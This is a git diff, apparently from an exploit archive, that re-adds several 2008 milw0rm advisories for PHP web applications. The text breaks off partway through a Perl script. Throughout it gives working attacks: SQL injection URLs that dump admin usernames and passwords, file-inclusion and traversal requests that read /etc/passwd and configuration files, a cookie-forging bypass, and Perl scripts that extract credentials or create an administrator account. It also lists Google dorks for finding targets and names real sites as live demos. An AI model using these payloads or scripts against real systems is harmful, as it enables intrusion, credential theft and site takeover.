-[~] Example: /index.php?option=com_dailymessage&Itemid=31&page=[PAGENAME]&id=-7+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users--
-
-########################################
-
-[~] Live Demo: http://www.drakbutiken.se/index.php?option=com_dailymessage&Itemid=31&page=faq&id=-7+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users--
-
-[~] Live Demo: http://www.drakbutiken.se/index.php?option=com_dailymessage&Itemid=31&page=drivers&id=-7+union+select+1,concat(username,char(58),password)KHG,3+from+jos_users--
-
-########################################
-
-[~] Proud 2 be Albanian
-[~] Proud 2 be Muslim
-[~] United States of Albania
-
-########################################
-
-# milw0rm.com [2008-10-22]
+#############################################################################
+#							                    #
+#      Joomla Component Daily Message (id) SQL Injection Vulnerability      #
+#							                    #
+#############################################################################
+
+
+########################################
+
+[~] Vulnerability found by: H!tm@N
+[~] Contact: hitman[at]khg-crew[dot]ws
+[~] Site: www.khg-crew.ws
+[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-]
+
+########################################
+
+[~] ScriptName:    "Joomla"
+[~] Component:     "Daily Message (com_dailymessage)"  
+[~] Version:       "1.0.3 "
+[~] Date:          "10/4/2005 "
+[~] Author:        "Joseph LeBlanc"
+[~] Author E-mail: "contact@jlleblanc.com"
+[~] Author URL:    "www.jlleblanc.com"
+
+########################################
+
+[~] Exploit: /index.php?option=com_dailymessage&Itemid=31&page=[PAGENAME]&id=[SQL]
+
+[~] Example: /index.php?option=com_dailymessage&Itemid=31&page=[PAGENAME]&id=-7+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users--
+
+########################################
+
+[~] Live Demo: http://www.drakbutiken.se/index.php?option=com_dailymessage&Itemid=31&page=faq&id=-7+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users--
+
+[~] Live Demo: http://www.drakbutiken.se/index.php?option=com_dailymessage&Itemid=31&page=drivers&id=-7+union+select+1,concat(username,char(58),password)KHG,3+from+jos_users--
+
+########################################
+
+[~] Proud 2 be Albanian
+[~] Proud 2 be Muslim
+[~] United States of Albania
+
+########################################
+
+# milw0rm.com [2008-10-22]
diff --git a/platforms/php/webapps/6803.txt b/platforms/php/webapps/6803.txt
index 67a99802f..9c49711c7 100755
--- a/platforms/php/webapps/6803.txt
+++ b/platforms/php/webapps/6803.txt
@@ -1,18 +1,18 @@
-Found by: X0r
-Iamma Simple Gallery Arbitrary File Upload
-Version: 1,2 (?)
-Email: evolutionteam.x0[at]gmail[dot]com
-Script
-Download:http://www.matteoiammarrone.com/public/modules.php?name=Downloads&d_op=getit&lid=4
-
-Script Download
-2:http://www.pierotofy.it/pages/download.php?filename=100p97q116r97s47t112a114i111f103g114h97n109o115l47m80b72c80d47e105u115v103z50p46q122r105s112t
-
-Bug: There isn't any check for file extensions.
-
-Exploit: http://[site]/[path]/upload.php
-
-
-// X0r - EvolutionTeaM
-
-# milw0rm.com [2008-10-22]
+Found by: X0r
+Iamma Simple Gallery Arbitrary File Upload
+Version: 1,2 (?)
+Email: evolutionteam.x0[at]gmail[dot]com
+Script
+Download:http://www.matteoiammarrone.com/public/modules.php?name=Downloads&d_op=getit&lid=4
+
+Script Download
+2:http://www.pierotofy.it/pages/download.php?filename=100p97q116r97s47t112a114i111f103g114h97n109o115l47m80b72c80d47e105u115v103z50p46q122r105s112t
+
+Bug: There isn't any check for file extensions.
+
+Exploit: http://[site]/[path]/upload.php
+
+
+// X0r - EvolutionTeaM
+
+# milw0rm.com [2008-10-22]
diff --git a/platforms/php/webapps/6806.txt b/platforms/php/webapps/6806.txt
index b8aece28d..2660aa07f 100755
--- a/platforms/php/webapps/6806.txt
+++ b/platforms/php/webapps/6806.txt
@@ -1,33 +1,33 @@
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-phpcrs <= 2.06 / Local File Inclusion Vulnerability
--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-
-$ Program: phpcrs
-$ Version: <= 2.06
-$ File affected: frame.php
-$ Download: http://sourceforge.net/projects/phpcrs/
-
-
-Found by Pepelux 
-eNYe-Sec - www.enye-sec.org
-
-
---Bug --
-
-151.	elseif( isset( $btnStartImport  ) ) {
-152.   		require("../inc/frmDoImport.inc.php");
-153. 		require("../inc/". $importFunction .".inc.php");
-154.		require("../inc/inc/getFunctions.inc.php");
-155.		$importFunction();
-156.		frmDoImport( $selectedImport );
-157.	}
-
-
--- Exploit --
-
-http://site.com/frame.php?btnStartImport=xxx&importFunction=../../../../../etc/passwd%00
-
-NOTE: website only works with Firefox. To navigate you must use Firefox and to exploit 
-it, you only have to change the user-agent.
-
-# milw0rm.com [2008-10-22]
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+phpcrs <= 2.06 / Local File Inclusion Vulnerability
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+$ Program: phpcrs
+$ Version: <= 2.06
+$ File affected: frame.php
+$ Download: http://sourceforge.net/projects/phpcrs/
+
+
+Found by Pepelux 
+eNYe-Sec - www.enye-sec.org
+
+
+--Bug --
+
+151.	elseif( isset( $btnStartImport  ) ) {
+152.   		require("../inc/frmDoImport.inc.php");
+153. 		require("../inc/". $importFunction .".inc.php");
+154.		require("../inc/inc/getFunctions.inc.php");
+155.		$importFunction();
+156.		frmDoImport( $selectedImport );
+157.	}
+
+
+-- Exploit --
+
+http://site.com/frame.php?btnStartImport=xxx&importFunction=../../../../../etc/passwd%00
+
+NOTE: website only works with Firefox. To navigate you must use Firefox and to exploit 
+it, you only have to change the user-agent.
+
+# milw0rm.com [2008-10-22]
diff --git a/platforms/php/webapps/6808.pl b/platforms/php/webapps/6808.pl
index ee68d893c..3a25235d8 100755
--- a/platforms/php/webapps/6808.pl
+++ b/platforms/php/webapps/6808.pl
@@ -1,30 +1,30 @@
-#!/usr/bin/perl
-# This Exploit requires a valid user name and password of an account regardless of the permissions
-#
-# Author: Xianur0
-# Affected: All Versions
-# Bug: SQL Injection
-# 
-# Doorks:
-#  allintext: "powered by LoudBlog"
-
-
-  use HTTP::Request::Common qw(POST);
-  use LWP::UserAgent;
-  use Digest::MD5 qw(md5_hex);
-  $ua = LWP::UserAgent->new;
-
-print "\n             LoudBlog Exploit All Version By Xianur0\n\n";
-$uri = $ARGV[0];
-$id = $ARGV[1];
-$password = $ARGV[3] || die("\nUse: loudblog.pl [URI] [ID Admin] [Valid User] [Valid Password]\n");
-$md5 = md5_hex($ARGV[2]).":".md5_hex($password);
-
-  my $req = POST $uri.'/loudblog/ajax.php',
-                [ colpick => "concat(0x557365723a20,nickname,0x0d0a50617373776f72643a20,password)", rowpick => "id", rowval => $id, table => 'authors', action => 'singleread'];
-$req->header('User-Agent' => 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17');
-$req->header('Cookie' => 'lbauth='.$md5);
-$res = $ua->request($req);
-  print $res->content."\n"; 
-
-# milw0rm.com [2008-10-22]
+#!/usr/bin/perl
+# This Exploit requires a valid user name and password of an account regardless of the permissions
+#
+# Author: Xianur0
+# Affected: All Versions
+# Bug: SQL Injection
+# 
+# Doorks:
+#  allintext: "powered by LoudBlog"
+
+
+  use HTTP::Request::Common qw(POST);
+  use LWP::UserAgent;
+  use Digest::MD5 qw(md5_hex);
+  $ua = LWP::UserAgent->new;
+
+print "\n             LoudBlog Exploit All Version By Xianur0\n\n";
+$uri = $ARGV[0];
+$id = $ARGV[1];
+$password = $ARGV[3] || die("\nUse: loudblog.pl [URI] [ID Admin] [Valid User] [Valid Password]\n");
+$md5 = md5_hex($ARGV[2]).":".md5_hex($password);
+
+  my $req = POST $uri.'/loudblog/ajax.php',
+                [ colpick => "concat(0x557365723a20,nickname,0x0d0a50617373776f72643a20,password)", rowpick => "id", rowval => $id, table => 'authors', action => 'singleread'];
+$req->header('User-Agent' => 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17');
+$req->header('Cookie' => 'lbauth='.$md5);
+$res = $ua->request($req);
+  print $res->content."\n"; 
+
+# milw0rm.com [2008-10-22]
diff --git a/platforms/php/webapps/6809.txt b/platforms/php/webapps/6809.txt
index a881a7220..3074f216d 100755
--- a/platforms/php/webapps/6809.txt
+++ b/platforms/php/webapps/6809.txt
@@ -1,40 +1,40 @@
-[o]------------------------------------------------------------------------------------[x]
- |  Arbitrary File Download Vulnerability                                               |
-[o]------------------------------------------------------------------------------------[o]
- |  Software : ionFiles 4.4.2 Component for Joomla! CMS                                 |
- |  Vendor   : http://forum.codecall.net/                                               |
- |  Date     : 23 October 2008                                                          |
- |  Author   : Vrs-hCk                                                                  |
- |  Contact  : d00r[at]telkom[dot]net                                                   |
-[o]------------------------------------------------------------------------------------[o]
-
-[»] Google Dork
-
-    inurl:com_ionfiles
-
-[»] Vulnerable
-
-    ./download.php
-	
-	Line 32: $file = $_GET['file'];
-    Line 33: $download = $_GET['download'];
-    Line 66 - 91
-
-[»] Exploit
-
-    http://[site]/[path]/com_ionfiles/download.php?file=[path_file]&download=1
-
-[»] Proof of Concept
-
-    http://esecutech.com/components/com_ionfiles/download.php?file=../../configuration.php&download=1
-    http://esecutech.com/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1
-
-[o]------------------------------------------------------------------------------------[x]
- |  Greetz                                                                              |
-[o]------------------------------------------------------------------------------------[o]
- |  All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org        |
- |  Jack, Darmawan, Mario, Zeth, Angela Chang, Janroe, Lukman, Didy, Anthonius,         |
- |  Daus, Rijal, Andrei, Toyong, dkk ... Indonesia Banget xixixix ... :))               |
-[o]------------------------------------------------------------------------------------[o]
-
-# milw0rm.com [2008-10-22]
+[o]------------------------------------------------------------------------------------[x]
+ |  Arbitrary File Download Vulnerability                                               |
+[o]------------------------------------------------------------------------------------[o]
+ |  Software : ionFiles 4.4.2 Component for Joomla! CMS                                 |
+ |  Vendor   : http://forum.codecall.net/                                               |
+ |  Date     : 23 October 2008                                                          |
+ |  Author   : Vrs-hCk                                                                  |
+ |  Contact  : d00r[at]telkom[dot]net                                                   |
+[o]------------------------------------------------------------------------------------[o]
+
+[»] Google Dork
+
+    inurl:com_ionfiles
+
+[»] Vulnerable
+
+    ./download.php
+	
+	Line 32: $file = $_GET['file'];
+    Line 33: $download = $_GET['download'];
+    Line 66 - 91
+
+[»] Exploit
+
+    http://[site]/[path]/com_ionfiles/download.php?file=[path_file]&download=1
+
+[»] Proof of Concept
+
+    http://esecutech.com/components/com_ionfiles/download.php?file=../../configuration.php&download=1
+    http://esecutech.com/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1
+
+[o]------------------------------------------------------------------------------------[x]
+ |  Greetz                                                                              |
+[o]------------------------------------------------------------------------------------[o]
+ |  All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org        |
+ |  Jack, Darmawan, Mario, Zeth, Angela Chang, Janroe, Lukman, Didy, Anthonius,         |
+ |  Daus, Rijal, Andrei, Toyong, dkk ... Indonesia Banget xixixix ... :))               |
+[o]------------------------------------------------------------------------------------[o]
+
+# milw0rm.com [2008-10-22]
diff --git a/platforms/php/webapps/6811.txt b/platforms/php/webapps/6811.txt
index a54c9083e..7170ecf58 100755
--- a/platforms/php/webapps/6811.txt
+++ b/platforms/php/webapps/6811.txt
@@ -1,48 +1,48 @@
-|___________________________________________________|
-|
-|  YDC ( cat) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|--------------------    Hussin X  -------------------|
-|
-|    Author: Hussin X
-|
-|    Home :  WwW.IQ-ty.CoM
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|___________________________________________________
-|                                                                                                     |
-|
-| script :  http://www.ydc.ir/
-|
-| DorK   : "Powered by     YDC"
-|___________________________________________________|
-
-Exploit:
-________
-
-
-
-www.[target].com/Script/klist.php?cat=-0+union+select+0,concat(user,0x3e,pass),0,0,0,0,0,0,0,0,0,0+FROM+iadmin--
-
-or
-
-klist.php?cat=-0+uNioN+sELeCT+0,concat(user,0x3e,pass),0,0,0,0,0,0,0,0,0,0,0,0+FROM+iadmin--
-
-
-
-
-____________________________( Greetz )_________________________________
-|
-|   All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
-|
-|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
-|
-|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab
-|_____________________________________________________________________
-
-
-                   Im IRAQi    |    Im TrYaGi
-
-# milw0rm.com [2008-10-22]
+|___________________________________________________|
+|
+|  YDC ( cat) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|--------------------    Hussin X  -------------------|
+|
+|    Author: Hussin X
+|
+|    Home :  WwW.IQ-ty.CoM
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|___________________________________________________
+|                                                                                                     |
+|
+| script :  http://www.ydc.ir/
+|
+| DorK   : "Powered by     YDC"
+|___________________________________________________|
+
+Exploit:
+________
+
+
+
+www.[target].com/Script/klist.php?cat=-0+union+select+0,concat(user,0x3e,pass),0,0,0,0,0,0,0,0,0,0+FROM+iadmin--
+
+or
+
+klist.php?cat=-0+uNioN+sELeCT+0,concat(user,0x3e,pass),0,0,0,0,0,0,0,0,0,0,0,0+FROM+iadmin--
+
+
+
+
+____________________________( Greetz )_________________________________
+|
+|   All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
+|
+|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
+|
+|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab
+|_____________________________________________________________________
+
+
+                   Im IRAQi    |    Im TrYaGi
+
+# milw0rm.com [2008-10-22]
diff --git a/platforms/php/webapps/6814.php b/platforms/php/webapps/6814.php
index 934fafaef..fe898660c 100755
--- a/platforms/php/webapps/6814.php
+++ b/platforms/php/webapps/6814.php
@@ -1,47 +1,47 @@
-
-eNYe-Sec - www.enye-sec.org
-
-
---Bug --
-
-4.	if (!$language)$language="ch";
-5.	include_once("../lib/lang.".$language.".php");
-
-
-
--- Exploit --
-
-http://site.com/ADMIN/header.php?language=/../../../../../etc/passwd%00
-
-# milw0rm.com [2008-10-23]
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+txtshop - beta 1.0 / Local File Inclusion Vulnerability
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+$ Program: txtshop
+$ Version: <= 1.0
+$ File affected: ADMIN/header.php
+$ Download: http://sourceforge.net/projects/txtshop/
+
+
+Found by Pepelux 
+eNYe-Sec - www.enye-sec.org
+
+
+--Bug --
+
+4.	if (!$language)$language="ch";
+5.	include_once("../lib/lang.".$language.".php");
+
+
+
+-- Exploit --
+
+http://site.com/ADMIN/header.php?language=/../../../../../etc/passwd%00
+
+# milw0rm.com [2008-10-23]
diff --git a/platforms/php/webapps/6817.txt b/platforms/php/webapps/6817.txt
index 026a99b2c..4765eab13 100755
--- a/platforms/php/webapps/6817.txt
+++ b/platforms/php/webapps/6817.txt
@@ -1,55 +1,55 @@
-[o]------------------------------------------------------------------------------------[x]
- |  Local File Inclusion Vulnerability                                                  |
-[o]------------------------------------------------------------------------------------[o]
- |  Software : RWCards 3.0.11 Component for Joomla 1.5 CMS                              |
- |  Vendor   : http://www.weberr.de/                                                    |
- |  Date     : 23 October 2008                                                          |
- |  Author   : Vrs-hCk                                                                  |
- |  Contact  : d00r[at]telkom[dot]net                                                   |
-[o]------------------------------------------------------------------------------------[o]
-
-[»] Google Dork
-
-    inurl:com_rwcards
-
-[»] Vulnerable
-
-    ./components/com_rwcards/captcha/captcha_image.php
-
-    15: if (!empty( $_GET['img'] ) )
-    16:    $img = $_GET['img'];
-    17: else
-    18: {
-    19:    echo 'no image file specified via &img=...';
-    20:    exit;
-    21: }
-    22:
-    23: if (!$fh = fopen( $tmp_dir_path.'cap_'.$img.'.jpg', 'rb'))
-    24:    {
-    25:        echo 'could not open image file!';
-    26:    }
-    27: else 
-    28: {	
-    29:     fpassthru( $fh );
-    30:     fclose( $fh );
-    31: }    
-
-[»] Exploit
-
-    http://[site]/[path]/components/com_rwcards/captcha/captcha_image.php?img=[LFI]%00
-
-[»] Proof of Concept
-
-    http://www.abcdobebe.com/components/com_rwcards/captcha/captcha_image.php?img=[LFI]%00
-    http://www.whiskynet.co.uk/components/com_rwcards/captcha/captcha_image.php?img=[LFI]%00
-
-[o]------------------------------------------------------------------------------------[x]
- |  Greetz                                                                              |
-[o]------------------------------------------------------------------------------------[o]
- |  All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org        |
- |  Paman, OoN_Boy, NoGe, Fluzy, H312Y, s3t4n, Angela Chang, IrcMafia, }^-^{, em|nem,   |
- |  loqsa, pizzyroot, xx_user, ^Bradley, ayulina, MaDOnk, nTc, terbang_melayang,        |
- |  chawanua, bl4Ck_3n91n3, R3V4N_B4ST4RD, dkk ... c0li.m0de.0n !!!                     |
-[o]------------------------------------------------------------------------------------[o]
-
-# milw0rm.com [2008-10-23]
+[o]------------------------------------------------------------------------------------[x]
+ |  Local File Inclusion Vulnerability                                                  |
+[o]------------------------------------------------------------------------------------[o]
+ |  Software : RWCards 3.0.11 Component for Joomla 1.5 CMS                              |
+ |  Vendor   : http://www.weberr.de/                                                    |
+ |  Date     : 23 October 2008                                                          |
+ |  Author   : Vrs-hCk                                                                  |
+ |  Contact  : d00r[at]telkom[dot]net                                                   |
+[o]------------------------------------------------------------------------------------[o]
+
+[»] Google Dork
+
+    inurl:com_rwcards
+
+[»] Vulnerable
+
+    ./components/com_rwcards/captcha/captcha_image.php
+
+    15: if (!empty( $_GET['img'] ) )
+    16:    $img = $_GET['img'];
+    17: else
+    18: {
+    19:    echo 'no image file specified via &img=...';
+    20:    exit;
+    21: }
+    22:
+    23: if (!$fh = fopen( $tmp_dir_path.'cap_'.$img.'.jpg', 'rb'))
+    24:    {
+    25:        echo 'could not open image file!';
+    26:    }
+    27: else 
+    28: {	
+    29:     fpassthru( $fh );
+    30:     fclose( $fh );
+    31: }    
+
+[»] Exploit
+
+    http://[site]/[path]/components/com_rwcards/captcha/captcha_image.php?img=[LFI]%00
+
+[»] Proof of Concept
+
+    http://www.abcdobebe.com/components/com_rwcards/captcha/captcha_image.php?img=[LFI]%00
+    http://www.whiskynet.co.uk/components/com_rwcards/captcha/captcha_image.php?img=[LFI]%00
+
+[o]------------------------------------------------------------------------------------[x]
+ |  Greetz                                                                              |
+[o]------------------------------------------------------------------------------------[o]
+ |  All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org        |
+ |  Paman, OoN_Boy, NoGe, Fluzy, H312Y, s3t4n, Angela Chang, IrcMafia, }^-^{, em|nem,   |
+ |  loqsa, pizzyroot, xx_user, ^Bradley, ayulina, MaDOnk, nTc, terbang_melayang,        |
+ |  chawanua, bl4Ck_3n91n3, R3V4N_B4ST4RD, dkk ... c0li.m0de.0n !!!                     |
+[o]------------------------------------------------------------------------------------[o]
+
+# milw0rm.com [2008-10-23]
diff --git a/platforms/php/webapps/6818.txt b/platforms/php/webapps/6818.txt
index 2fe4b6f5b..a928d9635 100755
--- a/platforms/php/webapps/6818.txt
+++ b/platforms/php/webapps/6818.txt
@@ -1,36 +1,36 @@
-# aflog 1.01 Multiple Insecure Cookie Handling Vulnerabilies
-# url: http://www.aflog.org/download.php
-#
-# Author: JosS
-# mail: sys-project[at]hotmail[dot]com
-# site: http://spanish-hackers.com
-# team: Spanish Hackers Team - [SHT]
-#
-# This was written for educational purpose. Use it at your own risk.
-# Author will be not responsible for any damage.
-
-vuln file: /edit_delete.php
-vuln code:
-15: if($_COOKIE['aflog_auth_a']=="O" || $_COOKIE['aflog_auth_a']=="A"){
-xx: .. ---> :P
-33: }
-34: } else {
-35:  echo "
     ERROR!
    You do not have access to this page. You must be Signed In as
-36: an Admin.

    ";
-37:  echo "
    Home | Sign In
    ":
-38: }
-
-exploit:    javascript:document.cookie = "aflog_auth_a=0; path=/"; document.cookie = "aflog_auth_a=A; path=/";
-and enters: /edit_delete.php?id=1 --> POST ID!!
----
-vuln files:
-edit_cat.php
-edit_lock.php
-edit_form.php
-...more?
-
-dork: "powered by aflog"
-
-Hack0wn :D
-
-# milw0rm.com [2008-10-23]
+# aflog 1.01 Multiple Insecure Cookie Handling Vulnerabilies
+# url: http://www.aflog.org/download.php
+#
+# Author: JosS
+# mail: sys-project[at]hotmail[dot]com
+# site: http://spanish-hackers.com
+# team: Spanish Hackers Team - [SHT]
+#
+# This was written for educational purpose. Use it at your own risk.
+# Author will be not responsible for any damage.
+
+vuln file: /edit_delete.php
+vuln code:
+15: if($_COOKIE['aflog_auth_a']=="O" || $_COOKIE['aflog_auth_a']=="A"){
+xx: .. ---> :P
+33: }
+34: } else {
+35:  echo "
     ERROR!
    You do not have access to this page. You must be Signed In as
+36: an Admin.

    ";
+37:  echo "
    Home | Sign In
    ":
+38: }
+
+exploit:    javascript:document.cookie = "aflog_auth_a=0; path=/"; document.cookie = "aflog_auth_a=A; path=/";
+and enters: /edit_delete.php?id=1 --> POST ID!!
+---
+vuln files:
+edit_cat.php
+edit_lock.php
+edit_form.php
+...more?
+
+dork: "powered by aflog"
+
+Hack0wn :D
+
+# milw0rm.com [2008-10-23]
diff --git a/platforms/php/webapps/6819.txt b/platforms/php/webapps/6819.txt
index 871ee8d23..e230ed83c 100755
--- a/platforms/php/webapps/6819.txt
+++ b/platforms/php/webapps/6819.txt
@@ -1,47 +1,47 @@
-==================================================================================
-  MindDezign Photo Gallery 2.2 (index.php id) Remote SQL Injection Vulnerability
-==================================================================================
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-AUTHOR : CWH Underground
-DATE   : 23 October 2008
-SITE   : cwh.citec.us
-
-
-#####################################################
-APPLICATION : MindDezign Photo Gallery
-VERSION	    : 2.2
-DOWNLOAD    : http://gallery.minddezign.com/?module=download
-#####################################################
-
---- Remote SQL Injection ---
-
-** Magic Quote must turn off **
-
-
-[+] Vulnerable in index.php (id)
-
----------
- Exploit
----------
-
-[+] http://[target]/[gallery_path]/index.php?module=gallery&action=info&cate_id=1&id=-9999'+union+select+1,2,3,4,5,6,7,8,concat(gal_admin_username,0x3a3a,gal_admin_password),10+from+gallery_admin--
-
-
-#######################################################################################
-Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
-Special Thx : asylu3, str0ke, citec.us, milw0rm.com
-#######################################################################################
-
-# milw0rm.com [2008-10-23]
+==================================================================================
+  MindDezign Photo Gallery 2.2 (index.php id) Remote SQL Injection Vulnerability
+==================================================================================
+
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+AUTHOR : CWH Underground
+DATE   : 23 October 2008
+SITE   : cwh.citec.us
+
+
+#####################################################
+APPLICATION : MindDezign Photo Gallery
+VERSION	    : 2.2
+DOWNLOAD    : http://gallery.minddezign.com/?module=download
+#####################################################
+
+--- Remote SQL Injection ---
+
+** Magic Quote must turn off **
+
+
+[+] Vulnerable in index.php (id)
+
+---------
+ Exploit
+---------
+
+[+] http://[target]/[gallery_path]/index.php?module=gallery&action=info&cate_id=1&id=-9999'+union+select+1,2,3,4,5,6,7,8,concat(gal_admin_username,0x3a3a,gal_admin_password),10+from+gallery_admin--
+
+
+#######################################################################################
+Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
+Special Thx : asylu3, str0ke, citec.us, milw0rm.com
+#######################################################################################
+
+# milw0rm.com [2008-10-23]
diff --git a/platforms/php/webapps/6820.pl b/platforms/php/webapps/6820.pl
index 550b82cdd..d6c34caf2 100755
--- a/platforms/php/webapps/6820.pl
+++ b/platforms/php/webapps/6820.pl
@@ -1,115 +1,115 @@
-#!/usr/bin/perl
-#=============================================================
-# MindDezign Photo 2.2 Gallery Arbitrary Add Admin Exploit
-#=============================================================
-#  ,--^----------,--------,-----,-------^--,
-#  | |||||||||   `--------'     |          O	.. CWH Underground ..
-#  `+---------------------------^----------|
-#    `\_,-------, _________________________|
-#      / XXXXXX /`|     /
-#     / XXXXXX /  `\   /
-#    / XXXXXX /\______(
-#   / XXXXXX /           
-#  / XXXXXX /
-# (________(             
-#  `------'
-#
-#AUTHOR : CWH Underground
-#DATE   : 23 October 2008
-#SITE   : cwh.citec.us
-#
-#
-#####################################################
-#APPLICATION : MindDezign Photo Gallery
-#VERSION	 : 2.2
-#DOWNLOAD    : http://gallery.minddezign.com/?module=download
-#####################################################
-#
-#Note: magic_quotes_gpc = off
-#
-#This Exploit will Add user to Administrator's Privilege.
-#
-#######################################################################################
-#Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
-#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
-#######################################################################################
-
-use LWP;
-use HTTP::Request;
-use HTTP::Cookies;
-
-print "\n==================================================\n";
-print "    MindDezign Photo Arbitrary Add Admin Exploit \n";
-print " \n";
-print "         Discovered By CWH Underground \n";
-print "==================================================\n";
-print "                                              \n";
-print "  ,--^----------,--------,-----,-------^--,   \n";
-print "  | |||||||||   `--------'     |          O	\n";
-print "  `+---------------------------^----------|   \n";
-print "    `\_,-------, _________________________|   \n";
-print "      / XXXXXX /`|     /                      \n";
-print "     / XXXXXX /  `\   /                       \n";
-print "    / XXXXXX /\______(                        \n";
-print "   / XXXXXX /                                 \n";
-print "  / XXXXXX /   .. CWH Underground ..  \n";
-print " (________(                                   \n";
-print "  `------'                                    \n";
-print "                                              \n";
-
-if ($#ARGV + 1 != 3)
-{
-   print "Usage: ./xpl.pl   \n";
-   print "Ex. ./xpl.pl http://www.target.com/gallery/ cwhuser cwhpass\n";
-   exit();
-}
-
-$blogurl = $ARGV[0];
-$user = $ARGV[1];
-$pass = $ARGV[2];
-
-$loginurl = $blogurl."?module=admin&action=login&task=login";
-$adduserurl = $blogurl."?module=admin&action=account&task=edit";
-$post_content = "username=".$user."&password=".$pass."&confirm_pass=".$pass."&btn_submit=Submit";
-
-
-print "\n..::Login Page URL::..\n";
-print "$loginurl\n";
-print "\n..::Add User Page URL::..\n";
-print "$adduserurl\n\n";
-print "..::Login Process::..\n";
-
-$ua = LWP::UserAgent->new;
-$ua->cookie_jar(HTTP::Cookies->new);
-$request = HTTP::Request->new (POST => $loginurl);
-$request->header (Accept-Charset => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7');
-$request->content_type ('application/x-www-form-urlencoded');
-$request->content ('username=admin\'+or+\'a\'=\'&password=a&btn_submit=Submit'); 
-$response = $ua->request($request);
-$location = $response -> header('Location');
-
-print "\n[+]Result :: ";
-
-if ($location =~ /gallery_item_list/)
-{
-   print "Login Success!!!\n";
-}
-else
-{
-   print "Login Failed!!!\n";
-   exit();
-}
-
-print "\n..::Add Admin Exploit::..\n";
-$request = HTTP::Request->new (POST => $adduserurl);
-$request->content_type ('application/x-www-form-urlencoded');
-$request->content ($post_content);
-$response = $ua->request($request);
-
-   print "\n[+]Result\n";
-   print "Username :: ".$user."\n";
-   print "Password :: ".$pass."\n";
-   print "Role     :: Administrator\n";
-   print "\nEnjoy with Bugs ;)"
-
-# milw0rm.com [2008-10-23]
+#!/usr/bin/perl
+#=============================================================
+# MindDezign Photo 2.2 Gallery Arbitrary Add Admin Exploit
+#=============================================================
+#  ,--^----------,--------,-----,-------^--,
+#  | |||||||||   `--------'     |          O	.. CWH Underground ..
+#  `+---------------------------^----------|
+#    `\_,-------, _________________________|
+#      / XXXXXX /`|     /
+#     / XXXXXX /  `\   /
+#    / XXXXXX /\______(
+#   / XXXXXX /           
+#  / XXXXXX /
+# (________(             
+#  `------'
+#
+#AUTHOR : CWH Underground
+#DATE   : 23 October 2008
+#SITE   : cwh.citec.us
+#
+#
+#####################################################
+#APPLICATION : MindDezign Photo Gallery
+#VERSION	 : 2.2
+#DOWNLOAD    : http://gallery.minddezign.com/?module=download
+#####################################################
+#
+#Note: magic_quotes_gpc = off
+#
+#This Exploit will Add user to Administrator's Privilege.
+#
+#######################################################################################
+#Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
+#Special Thx : asylu3, str0ke, citec.us, milw0rm.com
+#######################################################################################
+
+use LWP;
+use HTTP::Request;
+use HTTP::Cookies;
+
+print "\n==================================================\n";
+print "    MindDezign Photo Arbitrary Add Admin Exploit \n";
+print " \n";
+print "         Discovered By CWH Underground \n";
+print "==================================================\n";
+print "                                              \n";
+print "  ,--^----------,--------,-----,-------^--,   \n";
+print "  | |||||||||   `--------'     |          O	\n";
+print "  `+---------------------------^----------|   \n";
+print "    `\_,-------, _________________________|   \n";
+print "      / XXXXXX /`|     /                      \n";
